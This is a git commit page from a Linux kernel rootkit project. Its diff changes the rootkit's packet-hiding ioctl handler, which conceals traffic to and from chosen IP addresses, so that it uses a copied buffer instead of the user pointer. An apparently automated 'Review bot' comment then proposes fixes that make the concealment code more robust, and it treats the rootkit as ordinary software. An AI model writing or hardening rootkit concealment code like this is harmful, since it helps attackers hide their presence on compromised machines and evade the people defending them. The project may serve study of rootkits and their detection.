linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 9a24a6beaa28e244d39ce9e006aa183f119016c6
parent 4c779b45cea73696e6d59d22e3bdb30bd3a715c5
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 20 Dec 2020 17:22:19 +0100

Avoid directly accessing sarg to fix crash on rkcheck vm

Diffstat:
Msrc/channel.c | 12++++++------
1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/src/channel.c b/src/channel.c @@ -251,18 +251,18 @@ handle_packhide(unsigned long arg) } else if (!copy_from_user(buf, sarg, BUFLEN) && (strstr(buf, ":") || strstr(buf, "."))) { - if (sarg[0] == (char)1) { + if (buf[0] == (char)1) { if (!rootkit.hiding_packets) { hide_packets(); DEBUG_NOTICE("[g7] packet hiding on\n"); } - hide_ip(&sarg[1]); + hide_ip(&buf[1]); rootkit.hiding_packets = 1; - DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &sarg[1]); - } else if (sarg[0] == (char)-1) { - unhide_ip(&sarg[1]); - DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &sarg[1]); + DEBUG_INFO("[g7] hiding packets from/to ip address %s\n", &buf[1]); + } else if (buf[0] == (char)-1) { + unhide_ip(&buf[1]); + DEBUG_INFO("[g7] unhiding packets from/to ip address %s\n", &buf[1]); } else return -ENOTTY;
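Review bot: `buf` is used as a C string by `strstr()`, by `hide_ip(&buf[1])` / `unhide_ip(&buf[1])` and by the `%s` in `DEBUG_INFO`, but `copy_from_user(buf, sarg, BUFLEN)` copies raw bytes and does not guarantee a NUL among them. A caller that passes `BUFLEN` non-zero bytes would therefore make these calls read past the end of the buffer in kernel context. Assuming `buf` is `char buf[BUFLEN]` (its declaration and the start of `handle_packhide` are outside the hunk), terminate it before the first string call with `buf[BUFLEN - 1] = '\0';`, or copy with `strncpy_from_user(buf, sarg, BUFLEN)` and reject a return value that is negative or equal to `BUFLEN`. Declaring `sarg` as `const char __user *` would also let sparse flag the kind of direct user-pointer dereference this commit removes.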